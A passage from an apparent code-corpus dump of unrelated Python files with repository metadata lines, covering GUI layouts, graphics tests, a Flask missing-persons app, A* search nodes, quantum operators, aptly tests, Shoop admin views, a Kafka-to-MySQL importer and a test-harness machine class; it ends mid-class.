self.libloc_label1.setWordWrap(True)
self.libloc_label1.setObjectName(_fromUtf8("libloc_label1"))
self.gridLayout.addWidget(self.libloc_label1, 2, 0, 1, 3)
self.location = QtGui.QLineEdit(WizardPage)
self.location.setReadOnly(True)
self.location.setObjectName(_fromUtf8("location"))
self.gridLayout.addWidget(self.location, 3, 0, 1, 2)
self.button_change = QtGui.QPushButton(WizardPage)
self.button_change.setText(_("&Change"))
self.button_change.setObjectName(_fromUtf8("button_change"))
self.gridLayout.addWidget(self.button_change, 3, 2, 1, 1)
self.libloc_label2 = QtGui.QLabel(WizardPage)
self.libloc_label2.setText(_("If you have an existing calibre library, it will be copied to the new location. If a calibre library already exists at the new location, calibre will switch to using it."))
self.libloc_label2.setWordWrap(True)
self.libloc_label2.setObjectName(_fromUtf8("libloc_label2"))
self.gridLayout.addWidget(self.libloc_label2, 4, 0, 1, 3)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 1, 0, 1, 1)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem1, 5, 0, 1, 1)
self.label_3.setBuddy(self.language)
self.retranslateUi(WizardPage)
QtCore.QMetaObject.connectSlotsByName(WizardPage)
def retranslateUi(self, WizardPage):
pass
| yeyanchao/calibre | src/calibre/gui2/wizard/library_ui.py | Python | gpl-3.0 | 3,115 | 0.002889 |
import os
import unittest
from math import pi
import numpy
from kiva import agg
def save_path(filename):
return filename
def draw_arcs(gc, x2, y2, radiusstep=25.0):
gc.set_stroke_color((0.2,0.2,0.2)) # lightgray
gc.move_to(0, 0)
gc.line_to(100, 0)
gc.line_to(x2, y2)
gc.stroke_path()
gc.set_stroke_color((0,0,0))
for i in range(7):
gc.move_to(0, 0);
gc.arc_to(100, 0, x2, y2, i*radiusstep+20.0)
gc.stroke_path()
class TestAffineMatrix(unittest.TestCase):
def test_arc_to(self):
gc = agg.GraphicsContextArray((640,480), "rgba32")
axes = agg.CompiledPath()
axes.move_to(0.5, 50.5)
axes.line_to(100.5, 50.5)
axes.move_to(50.5, 0.5)
axes.line_to(50.5, 100.5)
box = agg.CompiledPath()
box.move_to(0.5, 0.5)
box.line_to(100.5, 0.5)
box.line_to(100.5, 100.5)
box.line_to(0.5, 100.5)
box.close_path()
arc = agg.CompiledPath()
arc.move_to(10, 10)
arc.line_to(20, 10)
arc.arc_to(40, 10, 40, 30, 20.0)
arc.line_to(40, 40)
whole_shebang = agg.CompiledPath()
whole_shebang.save_ctm()
whole_shebang.add_path(axes)
whole_shebang.add_path(box)
whole_shebang.translate_ctm(0.0, 50.5)
whole_shebang.add_path(arc)
whole_shebang.translate_ctm(50.5, 50.5)
whole_shebang.rotate_ctm(-agg.pi/2)
whole_shebang.add_path(arc)
whole_shebang.rotate_ctm(agg.pi/2)
whole_shebang.translate_ctm(50.5, -50.5)
whole_shebang.rotate_ctm(-agg.pi)
whole_shebang.add_path(arc)
whole_shebang.rotate_ctm(agg.pi)
whole_shebang.translate_ctm(-50.5, -50.5)
whole_shebang.rotate_ctm(-3*agg.pi/2)
whole_shebang.add_path(arc)
whole_shebang.restore_ctm()
gc.set_stroke_color((1.0,0.0,0.0))
gc.set_line_width(1.0)
ctm1 = gc.get_ctm()
gc.translate_ctm(50.5, 300.5)
gc.add_path(whole_shebang)
gc.stroke_path()
gc.translate_ctm(130.5, 50.0)
ctm2 = gc.get_ctm()
gc.rotate_ctm(-agg.pi/6)
gc.add_path(whole_shebang)
gc.set_stroke_color((0.0,0.0,1.0))
gc.stroke_path()
gc.set_ctm(ctm2)
gc.translate_ctm(130.5, 0.0)
ctm2 = gc.get_ctm()
gc.rotate_ctm(-agg.pi/3)
gc.scale_ctm(1.0, 2.0)
gc.add_path(whole_shebang)
gc.stroke_path()
gc.set_ctm(ctm1)
ctm1 = gc.get_ctm()
gc.translate_ctm(150.5, 20.5)
draw_arcs(gc, 70.5, 96.5)
gc.translate_ctm(300.5, 0)
draw_arcs(gc, 160.5, 76.5, 50.0)
gc.set_ctm(ctm1)
gc.translate_ctm(120.5, 100.5)
gc.scale_ctm(-1.0, 1.0)
draw_arcs(gc, 70.5, 96.5)
gc.translate_ctm(-300.5, 100.5)
gc.scale_ctm(0.75, -1.0)
draw_arcs(gc, 160.5, 76.5, 50.0)
gc.save(save_path("arc_to.png"))
def test_arc(self):
gc = agg.GraphicsContextArray((640,648))
gc.save(save_path("arc.png"))
def test_skewing_matrix(self):
val = agg.skewing_matrix(pi/4.,pi/4.)
desired = numpy.array([ 1.0,1.0,1.0,1.0,0.0,0.0])
actual = val.asarray()
assert(numpy.allclose(desired,actual))
if __name__ == "__main__":
unittest.main()
| tommy-u/enable | integrationtests/kiva/agg/test_arc.py | Python | bsd-3-clause | 3,344 | 0.006878 |
from flask import request, flash, render_template, url_for, redirect, abort, Blueprint, g
from aalert import app, db
from flask_login import login_required, logout_user, login_user, current_user
from aalert.forms import *
from aalert.models import *
from sqlalchemy_searchable import search
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
@app.before_request
def before_request():
g.search_form = SearchForm()
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(username=form.username.data, password=form.password.data)
db.session.add(user)
db.session.commit()
return redirect(url_for('index'))
return render_template('register.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first_or_404()
if user.is_correct_password(form.password.data):
login_user(user)
flash(u'Logged in Successfully.', 'success')
return redirect(url_for('index'))
else:
flash(u'Incorrect username/password combination.', 'error')
return redirect(url_for('index'))
return render_template('login.html', form=form)
@app.route('/', methods=['GET'])
def index():
entries = db.session.query(Info.id, Info.firstname, Info.lastname, Info.age,
Info.height,Info.last_loc, Info.missing_since)
return render_template('disp.html', entries=entries)
@app.route('/search', methods=['GET', 'POST'])
def search():
if not g.search_form.validate_on_submit():
flash(u'Incorrect format for search string.', 'error')
return redirect(url_for('index'))
return redirect(url_for('search_results', query=g.search_form.query.data))
@app.route('/search_results/<query>')
def search_results(query):
results = Info.query.search(query).limit(20).all()
if not results:  # .all() returns a list (never None), so test for emptiness
flash('No hits. Try a different search string.')
return render_template('search_results.html', query=query, results=results)
@app.route('/logout')
def logout():
logout_user()
flash(u'Logged out successfully.', 'success')
return redirect(url_for('index'))
#admin views
admin = Admin(app, name='Amber Alert Database', template_mode='bootstrap')
class ProtectedView(ModelView):
def is_accessible(self):
return current_user.is_authenticated
def inaccessible_callback(self, name, **kwargs):
return redirect(url_for('index'))
admin.add_view(ProtectedView(Info, db.session))
| nravic/py-amber_alert | aalert/views.py | Python | mit | 2,721 | 0.005513 |
import _plotly_utils.basevalidators
class TickformatstopsValidator(_plotly_utils.basevalidators.CompoundArrayValidator):
def __init__(
self, plotly_name="tickformatstops", parent_name="contour.colorbar", **kwargs
):
super(TickformatstopsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Tickformatstop"),
data_docs=kwargs.pop(
"data_docs",
"""
dtickrange
range [*min*, *max*], where "min", "max" -
dtick values which describe some zoom level, it
is possible to omit "min" or "max" value by
passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level,
the same as "tickformat"
""",
),
**kwargs
)
| plotly/python-api | packages/python/plotly/plotly/validators/contour/colorbar/_tickformatstops.py | Python | mit | 2,290 | 0.000873 |
from abc import ABCMeta, abstractmethod
#Node object, important for traversing the search graph. Abstract class
#that contains abstract methods that have to be implemented by subclasses.
#These abstract methods are what constitute the specialization of A*
#for this problem domain.
class Node(object):
__metaclass__ = ABCMeta
def __init__(self):
self.children = []
self.parents = []
#Generate successor nodes/states from itself.
@abstractmethod
def generate_successors(self):
pass
#A getter for the heuristic. The heuristic is an estimate of how near the
#specific node is to the goal. In the case of a distance A-to-B problem,
#H is the admissible (never overestimating) distance to the goal from the node's position.
@abstractmethod
def calc_H(self):
pass
#The actual distance from start to the node. The path cost.
def get_G(self):
return self.g
def set_G(self, cost):
self.g = cost
#Each node has to have to generate a id, to assess the uniqueness of the node.
@abstractmethod
def generate_id(self):
pass
#ArcCost from self to children. The pathcost from one node to another
@abstractmethod
def arc_cost(self, child):
pass
#If node is a solution
@abstractmethod
def is_solution(self):
pass
def add_child(self, node):
self.children.append(node)
def set_parent(self, node):
self.parents = []
self.parents.append(node)
def get_children(self):
return self.children
def get_parent(self):
#TODO: ONE PARENT?
if not self.parents:
return None
return self.parents[0]
def calc_F(self):
return self.get_G() + self.calc_H()
def get_level(self):
node = self
level = 0
while node:
node = node.get_parent()
level += 1
#Null not counted in while loop and should be subtracted
return level-1
def __lt__(self, other):
return self.calc_F() < other.calc_F()
#Representation for the GUI
@abstractmethod
def gui_representation(self, generated, popped):
pass
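# Illustrative sketch (not part of this module; GOAL, manhattan() and
# neighbors() are hypothetical helpers). A concrete A* domain would subclass
# Node and fill in the abstract hooks, e.g. for grid path-finding:
#
#   class GridNode(Node):
#       def generate_id(self): return self.position
#       def calc_H(self): return manhattan(self.position, GOAL)
#       def arc_cost(self, child): return 1
#       def is_solution(self): return self.position == GOAL
#       def generate_successors(self): return [GridNode(p) for p in neighbors(self.position)]
#       def gui_representation(self, generated, popped): pass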
| olavvatne/agac | abstractnode.py | Python | mit | 2,220 | 0.009459 |
import numpy as np
from scipy.sparse import csr_matrix
from .symbolic import Operator
SPARSITY_N_CUTOFF = 600 # TODO lower after fixing sparse matrices
def sparsify(mat):
assert SPARSITY_N_CUTOFF > 5, 'The SPARSITY_N_CUTOFF is set to a very low number.'
if min(mat.shape) > SPARSITY_N_CUTOFF:
return csr_matrix(mat)
return mat
def destroy(N):
return Operator('{a}_{%d}'%N,
N,
sparsify(np.diag(np.arange(1,N,dtype=complex)**0.5,k=1)))
def create(N): #TODO name prints ugly
return Operator('{a^\dagger}_{%d}'%N,
N,
sparsify(np.diag(np.arange(1,N,dtype=complex)**0.5,k=-1)))
def num(N):
return Operator('{n}_{%d}'%N,
N,
sparsify(np.diag(np.arange(0,N,dtype=complex))))
def identity(N):
return Operator('{I}_{%d}'%N,
N,
sparsify(np.eye(N,dtype=complex)))
def randomH(N):
m = np.random.random([N,N]) + 1j*np.random.random([N,N])
m = (m + np.conj(m.T))/2
return Operator.anon(N, sparsify(m))
s_m = np.array([[0, 0 ],[1 , 0]],dtype=complex)
s_p = np.array([[0, 1 ],[0 , 0]],dtype=complex)
s_x = np.array([[0, 1 ],[1 , 0]],dtype=complex)
s_y = np.array([[0,-1j],[1j, 0]],dtype=complex)
s_z = np.array([[1, 0 ],[0 ,-1]],dtype=complex)
def sigmam():
return Operator('σ_-', 2, s_m)
def sigmap():
return Operator('σ_+', 2, s_p)
def sigmax():
return Operator('σ_x', 2, s_x)
def sigmay():
return Operator('σ_y', 2, s_y)
def sigmaz():
return Operator('σ_z', 2, s_z)
| Krastanov/cutiepy | cutiepy/operators.py | Python | bsd-3-clause | 1,593 | 0.032116 |
import os
import inspect
from lib import BaseTest
def changesRemove(_, s):
return s.replace(os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "changes"), "")
class EditRepo1Test(BaseTest):
"""
edit repo: change comment
"""
fixtureCmds = [
"aptly repo create repo1",
]
runCmd = "aptly repo edit -comment=Lala repo1"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo1", "repo-show")
class EditRepo2Test(BaseTest):
"""
edit repo: change distribution & component
"""
fixtureCmds = [
"aptly repo create -comment=Lala -component=non-free repo2",
]
runCmd = "aptly repo edit -distribution=wheezy -component=contrib repo2"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo2", "repo-show")
class EditRepo3Test(BaseTest):
"""
edit repo: no such repo
"""
runCmd = "aptly repo edit repo3"
expectedCode = 1
class EditRepo4Test(BaseTest):
"""
edit repo: add uploaders.json
"""
fixtureCmds = [
"aptly repo create repo4",
]
runCmd = "aptly repo edit -uploaders-file=${changes}/uploaders2.json repo4"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo4", "repo_show")
class EditRepo5Test(BaseTest):
"""
edit repo: with broken uploaders.json
"""
fixtureCmds = [
"aptly repo create repo5",
]
runCmd = "aptly repo edit -uploaders-file=${changes}/uploaders3.json repo5"
expectedCode = 1
class EditRepo6Test(BaseTest):
"""
edit local repo: with missing uploaders.json
"""
fixtureCmds = [
"aptly repo create repo6",
]
runCmd = "aptly repo edit -uploaders-file=${changes}/uploaders-not-found.json repo6"
expectedCode = 1
outputMatchPrepare = changesRemove
class EditRepo7Test(BaseTest):
"""
edit local repo: remove uploaders.json
"""
fixtureCmds = [
"aptly repo create -uploaders-file=${changes}/uploaders2.json repo7",
]
runCmd = "aptly repo edit -uploaders-file= repo7"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo7", "repo_show")
| neolynx/aptly | system/t09_repo/edit.py | Python | mit | 2,278 | 0.000878 |
#################################### IMPORTS ###################################
from __future__ import generators
if __name__ == '__main__':
import sys
import os
pkg_dir = os.path.split(os.path.abspath(__file__))[0]
parent_dir, pkg_name = os.path.split(pkg_dir)
is_pygame_pkg = (pkg_name == 'tests' and
os.path.split(parent_dir)[1] == 'pygame')
if not is_pygame_pkg:
sys.path.insert(0, parent_dir)
else:
is_pygame_pkg = __name__.startswith('pygame.tests.')
if is_pygame_pkg:
from pygame.tests.test_utils import test_not_implemented, unittest, trunk_relative_path
else:
from test.test_utils import test_not_implemented, unittest
import pygame
import pygame._vlcbackend as gmovie
from pygame.locals import *
import os
import sys
import time
################################### CONSTANTS ##################################
filename = "War3.avi"
class MovieTypeTest( unittest.TestCase ):
def test_init(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie, True)
#screen = pygame.display.get_surface()
#movie = pygame.gmovie.Movie(filename, screen)
#self.assertEqual(movie, True)
del movie
def test_play_pause(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.playing, False)
movie.play(-1)
self.assertEqual(movie.playing, True)
self.assertEqual(movie.paused, False)
movie.pause()
self.assertEqual(movie.playing, False)
self.assertEqual(movie.paused, True)
movie.pause()
self.assertEqual(movie.playing, True)
self.assertEqual(movie.paused, False)
del movie
def test_stop(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.playing, False)
movie.play(-1)
self.assertEqual(movie.playing, True)
self.assertEqual(movie.paused, False)
movie.stop()
self.assertEqual(movie.playing, False)
self.assertEqual(movie.paused, False)
del movie
def test_rewind(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
movie.play(-1)
time.sleep(2)
#equivalent to stop without a time-argument
movie.rewind()
self.assertEqual(movie.playing, False)
self.assertEqual(movie.paused, False)
del movie
def test_width(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.width, 200)
del movie
def test_height(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
self.assertEqual(movie.height, 200)
del movie
def test_resize(self):
pygame.display.init()
pygame.mixer.quit()
movie_file = trunk_relative_path('examples/data/blue.mpg')
movie = gmovie.Movie(movie_file)
movie.play(-1)
movie.resize(movie.width/2, movie.height/2)
#equivalent to stop without a time-argument
self.assertEqual(movie.height, 100)
self.assertEqual(movie.width, 100)
del movie
| gmittal/aar-nlp-research-2016 | src/pygame-pygame-6625feb3fc7f/test/_vlcmovietest.py | Python | mit | 4,005 | 0.009488 |
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from copy import deepcopy
from django import forms
from django.conf import settings
from django.core.urlresolvers import reverse
from django.forms.models import modelform_factory
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from shoop.admin.base import MenuEntry
from shoop.admin.toolbar import Toolbar, URLActionButton, get_default_edit_toolbar
from shoop.admin.utils.views import CreateOrUpdateView
from shoop.core.models import PaymentMethod, ShippingMethod
from shoop.core.modules.interface import ModuleNotFound
from shoop.utils.multilanguage_model_form import MultiLanguageModelForm
class MethodEditToolbar(Toolbar):
def __init__(self, view_object):
super(Toolbar, self).__init__()
self.view_object = view_object
get_default_edit_toolbar(toolbar=self, view_object=view_object, save_form_id="method_form")
method = view_object.object
if method.pk:
self.build_detail_button(method)
def build_detail_button(self, method):
disable_reason = None
try:
if not method.module.admin_detail_view_class:
disable_reason = _("The selected module has no details to configure")
except ModuleNotFound:
disable_reason = _("The selected module is not currently available")
self.append(URLActionButton(
url=reverse(
"shoop_admin:%s.edit-detail" % self.view_object.action_url_name_prefix,
kwargs={"pk": method.pk}
),
text=_("Edit Details"),
icon="fa fa-pencil",
extra_css_class="btn-info",
disable_reason=disable_reason
))
class _BaseMethodEditView(CreateOrUpdateView):
model = None # Overridden below
action_url_name_prefix = None
template_name = "shoop/admin/methods/edit.jinja"
form_class = forms.Form
context_object_name = "method"
@property
def title(self):
return _(u"Edit %(model)s") % {"model": self.model._meta.verbose_name}
def get_breadcrumb_parents(self):
return [
MenuEntry(
text=force_text(self.model._meta.verbose_name_plural).title(),
url="shoop_admin:%s.list" % self.action_url_name_prefix
)
]
def get_form(self, form_class=None):
form_class = modelform_factory(
model=self.model,
form=MultiLanguageModelForm,
fields=("name", "status", "tax_class", "module_identifier"),
widgets={"module_identifier": forms.Select},
)
form = form_class(languages=settings.LANGUAGES, **self.get_form_kwargs())
form.fields["module_identifier"].widget.choices = self.model.get_module_choices(
empty_label=(_("Default %s module") % self.model._meta.verbose_name).title()
)
# Add fields from the module, if any...
form.module_option_field_names = []
for field_name, field in self.object.module.option_fields:
form.fields[field_name] = deepcopy(field)
form.module_option_field_names.append(field_name)
if self.object.module_data and field_name in self.object.module_data:
form.initial[field_name] = self.object.module_data[field_name]
return form
def get_success_url(self):
return reverse("shoop_admin:%s.edit" % self.action_url_name_prefix, kwargs={"pk": self.object.pk})
def get_toolbar(self):
return MethodEditToolbar(self)
def save_form(self, form):
self.object = form.save()
if not self.object.module_data:
self.object.module_data = {}
for field_name in form.module_option_field_names:
if field_name in form.cleaned_data:
self.object.module_data[field_name] = form.cleaned_data[field_name]
self.object.save()
class ShippingMethodEditView(_BaseMethodEditView):
model = ShippingMethod
action_url_name_prefix = "method.shipping"
class PaymentMethodEditView(_BaseMethodEditView):
model = PaymentMethod
action_url_name_prefix = "method.payment"
| lawzou/shoop | shoop/admin/modules/methods/views/edit.py | Python | agpl-3.0 | 4,422 | 0.002488 |
#!/usr/bin/python
######################################################################
#
# File: kafka_to_mysql.py
#
# Copyright 2015 TiVo Inc. All Rights Reserved.
#
######################################################################
"""
Usage: kafka_to_mysql.py <kafka_topic> <kafka_broker> <mysql-ip> <mysql-port> <mysql-user> <mysql-password> <mysql_table>
"""
import json
import MySQLdb
from kafka import KafkaClient, KafkaConsumer
import sys
def usage():
print __doc__
sys.exit(1)
def main():
# R0915: "too many statements in function (>50)"
# pylint: disable=R0915
if len(sys.argv) != 8:
print "Wrong number of arguments"
usage()
(kafka_topic, kafka_broker, mysql_host, mysql_port, mysql_user, mysql_password, mysql_table) = sys.argv[1:8]
sql_db = MySQLdb.connect(
host = mysql_host,
port = int(mysql_port),
user = mysql_user,
passwd = mysql_password)
query = sql_db.cursor()
client = KafkaClient(kafka_broker)
consumer = KafkaConsumer(kafka_topic, metadata_broker_list = [kafka_broker],
auto_commit_enable = False,
auto_offset_reset='smallest')
last_offsets = {}
partition_ids = client.get_partition_ids_for_topic(kafka_topic)
for partition in partition_ids:
offsets = consumer.get_partition_offsets(kafka_topic, partition, -1, 1)
print offsets
# Don't really understand this format, so put in asserts
# (Pdb) consumer.get_partition_offsets("topicname", 0, -1, 1)
# (15471)
assert len(offsets) == 1
assert offsets[0] > 0
next_offset = offsets[0]
last_offset = next_offset - 1
last_offsets[partition] = last_offset
finished_partitions = set()
print last_offsets
count = 0
# mapping from primary key tuples, to row data
insert_batch = {}
insert_sql = None
for m in consumer:
if m.partition in finished_partitions:
continue
count += 1
payload = m.value
(first_line, rest) = payload.split("\r\n", 1)
(_notused, header_len, _body_len) = first_line.split(" ")
header_len = int(header_len)
body = rest[header_len:]
primary_key_str = m.key
# import pdb; pdb.set_trace()
primary_keys = json.loads(primary_key_str)
primary_tuples = sorted(primary_keys.items())
sorted_primary_key_names = [ k for (k,v) in primary_tuples ]
sorted_primary_key_values = [ int(v) for (k,v) in primary_tuples ]
if len(body) > 0:
# This is a write
data = json.loads(body)
# date fields have to be turned from a number back into a datetime object
date_fields = ['createDate', 'updateDate']
for d in date_fields:
if d not in data:
continue
val = data[d]
if val is None:
continue
if val == -62170156800000:
# this is hacky and a sign that i'm doing something wrong, I think.
val = "0000-00-00 00:00:00"
else:
val = val/1000
import datetime;
val = datetime.datetime.utcfromtimestamp(val)
data[d] = val
keys = [ k for (k, v) in sorted(data.items()) ]
values = [ v for (k, v) in sorted(data.items()) ]
keys_wo_primary = [ k for (k, v) in sorted(data.items()) ]
for p in sorted_primary_key_names:
keys_wo_primary.remove(p)
# e.g.
# insert into dbname.tablename (col1, col2) values (%s, %s) on duplicate key update col2 = values(col2)
# assuming that col1 is the primary key
insert_sql = """insert into %s """ % mysql_table
insert_sql += """ (%s) """ % (", ".join(keys))
insert_sql += " values (%s) " % (", ".join(["%s"] * len(values) ))
insert_sql += "on duplicate key update "
insert_sql += ", ".join(["%s = values(%s)" % (k, k) for k in keys_wo_primary ])
insert_batch[tuple(primary_tuples)] = tuple(values)
if len(insert_batch) > 5000:
query.executemany(insert_sql, insert_batch.values())
sql_db.commit()
insert_batch = {}
else:
# This is a delete
if len(insert_batch) > 0 and insert_sql is not None:
# flush all writes before processing any deletes
query.executemany(insert_sql, insert_batch.values())
sql_db.commit()
insert_batch = {}
# get the primary keys, and delete the row
where_clause = ' and '.join([ "%s = %%s" % k for k in sorted_primary_key_names ])
# e.g.
# delete from dbname.tablename where field1 = %s and field2 = %s
delete_sql = """delete from %s where %s""" % (mysql_table, where_clause)
values = tuple(sorted_primary_key_values)
query.execute(delete_sql, values)
sql_db.commit()
# how do I know when to stop?
print "Partition %d Offset %d of %d" % (m.partition, m.offset, last_offsets.get(m.partition))
if m.offset >= last_offsets.get(m.partition):
finished_partitions.add(m.partition)
if len(finished_partitions) == len(last_offsets):
# All partitions are done.
break
if len(insert_batch) > 0:
# flush any remaining writes
query.executemany(insert_sql, insert_batch.values())
sql_db.commit()
insert_batch = {}
print "Imported %d messages into mysql" % count
if __name__ == "__main__":
main()
| TiVo/wombat | correctness/kafka_to_mysql.py | Python | apache-2.0 | 5,895 | 0.008142 |
# -*- coding: utf-8 -*-
from PyQt4 import QtGui, uic
import os
#from qgis.utils import iface
FORM_CLASS, _ = uic.loadUiType(os.path.join(os.path.dirname(__file__), 'padrohabitants_dialog.ui'))
class PadroHabitantsDialog(QtGui.QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(PadroHabitantsDialog, self).__init__(parent)
# Set up the user interface from Designer.
# After setupUI you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
# set icons and tooltips to the buttons
#self.center_PButton.setIcon(iface.actionPanToSelected().icon())
| psigcat/padrohabitants | plugin/ui/padrohabitants_dialog.py | Python | gpl-2.0 | 844 | 0.007109 |
#!/usr/bin/env python
#
# Author: Veronica G. Vergara L.
#
#
from .scheduler_factory import SchedulerFactory
from .jobLauncher_factory import JobLauncherFactory
from abc import abstractmethod, ABCMeta
import os
import shutil
class BaseMachine(metaclass=ABCMeta):
""" BaseMachine represents a compute resource and has the following
properties:
Attributes:
name: string representing the system's name
scheduler: an object of the BaseScheduler class
jobLauncher: an object of the BaseJobLauncher class
Methods:
get_machine_name:
print_machine_info:
print_scheduler_info:
print_jobLauncher_info:
set_numNodes:
"""
def __init__(self,name,scheduler_type,jobLauncher_type,numNodes,
numSockets,numCoresPerSocket,rgt_test_input_file,workspace,
harness_id,scripts_dir):
self.__name = name
self.__scheduler = SchedulerFactory.create_scheduler(scheduler_type)
self.__jobLauncher = JobLauncherFactory.create_jobLauncher(jobLauncher_type)
self.__numNodes = numNodes
self.__numSockets = numSockets
self.__numCoresPerSocket = numCoresPerSocket
self.__rgt_test_input_file = rgt_test_input_file
self.__rgt_workspace = workspace
self.__rgt_harness_id = harness_id
self.__rgt_scripts_dir = scripts_dir
self.set_rgt_results_dir()
def print_machine_info(self):
""" Print information about the machine"""
print("Machine name:\n"+self.get_machine_name())
self.__scheduler.print_scheduler_info()
print("Job Launcher info: ")
self.print_jobLauncher_info()
def get_machine_name(self):
""" Return a string with the system's name."""
return self.__name
def get_rgt_workspace(self):
""" Return a string with the path to the workspace."""
return self.__rgt_workspace
def create_rgt_workspace(self):
""" Create a workspace for this test instance."""
os.makedirs(self.get_rgt_workspace())
return
def get_rgt_input_file_name(self):
""" Return a string with the test input file name."""
return self.__rgt_test_input_file
def get_scheduler_type(self):
""" Return a string with the system's name."""
return self.__scheduler.get_scheduler_type()
def get_scheduler_template_file_name(self):
""" Return a string with the name of the scheduler's template file."""
return self.__scheduler.get_scheduler_template_file_name()
def submit_to_scheduler(self,batchfilename,unique_id):
""" Return the jobID for the submission."""
submit_exit_value = self.__scheduler.submit_job(batchfilename)
write_job_id_exit_value = self.__scheduler.write_jobid_to_status(unique_id)
return submit_exit_value and write_job_id_exit_value
def build_jobLauncher_command(self,template_dict):
""" Return the jobLauncher command."""
return self.__jobLauncher.build_job_command(template_dict)
def start_build_script(self,buildscriptname):
""" Return the status of the build."""
os.chdir(self.get_rgt_scripts_dir())
currentdir = os.getcwd()
print("current directory in base_machine: ",currentdir)
(dir_head1, dir_tail1) = os.path.split(currentdir)
(dir_head2, dir_tail2) = os.path.split(dir_head1)
path_to_source = os.path.join(dir_head2,"Source")
print("Path to Source: ",path_to_source)
self.create_rgt_workspace()
path_to_build_directory = os.path.join(self.get_rgt_workspace(),"build_directory")
print("Path to Build Dir: ", path_to_build_directory)
shutil.copytree(path_to_source,path_to_build_directory)
os.chdir(path_to_build_directory)
print("Starting build in directory: " + path_to_build_directory + " using " + buildscriptname)
build_exit_status = os.system(buildscriptname)
os.chdir(currentdir)
return build_exit_status
def check_results(self,checkscriptname):
""" Run the check script provided by the user and log the result to the status file."""
jstatus = self.start_check_script(checkscriptname)
self.write_check_exit_status(jstatus)
def start_check_script(self,checkscriptname):
""" Check if results are correct. """
currentdir = os.getcwd()
print("current directory in base_machine: ",currentdir)
os.chdir(self.get_rgt_results_dir())
print("Starting check script in base_machine: ",os.getcwd())
path_to_checkscript = os.path.join(self.get_rgt_scripts_dir(),checkscriptname)
print("Using check script: ",path_to_checkscript)
check_exit_status = os.system(path_to_checkscript)
os.chdir(currentdir)
return check_exit_status
def write_check_exit_status(self,jstatus):
""" Write the status of checking results to the status directory."""
(dir_head1, dir_tail1) = os.path.split(self.get_rgt_results_dir())
(dir_head2, dir_tail2) = os.path.split(dir_head1)
file1 = os.path.join(dir_head2,"Status",dir_tail1,"job_status.txt")
file1_obj = open(file1,"w")
print("Writing check_exit_status = ",jstatus," into ",file1)
# Set the string to write to the job_status.txt file.
#if jstatus == 0:
# pf = "1"
#elif jstatus == 1:
# pf = "0"
#elif jstatus >= 2:
# pf = "2"
string1 = "%s\n" % (jstatus)
file1_obj.write(string1)
file1_obj.close()
def start_report_script(self,reportscriptname):
""" Check if results are correct. """
os.chdir(self.get_rgt_scripts_dir())
currentdir = os.getcwd()
print("current directory in base_machine: ",currentdir)
report_exit_status = os.system(reportscriptname)
os.chdir(currentdir)
return report_exit_status
def get_rgt_harness_id(self):
""" Return the string with the Harness ID for this test instance."""
return self.__rgt_harness_id
def set_rgt_results_dir(self):
""" Return the string with the path to the Run_Archive/Harness ID directory."""
os.chdir(self.get_rgt_scripts_dir())
currentdir = os.getcwd()
(dir_head1, dir_tail1) = os.path.split(currentdir)
self.__rgt_results_dir = os.path.join(dir_head1,"Run_Archive",self.get_rgt_harness_id())
return
def get_rgt_results_dir(self):
""" Return the string corresponding to the path to the Run_Archive directory."""
return self.__rgt_results_dir
def get_rgt_scripts_dir(self):
return self.__rgt_scripts_dir
def get_rgt_workdir(self):
""" Return the string with the path to the Run_Archive/Harness ID directory."""
return os.path.join(self.get_rgt_workspace(),"workdir")
def print_jobLauncher_info(self):
""" Print information about the machine's job launcher."""
print("Job Launcher Information")
print(str(self.__jobLauncher))
def set_numNodes(self,numNodes):
self.__numNodes = numNodes
@abstractmethod
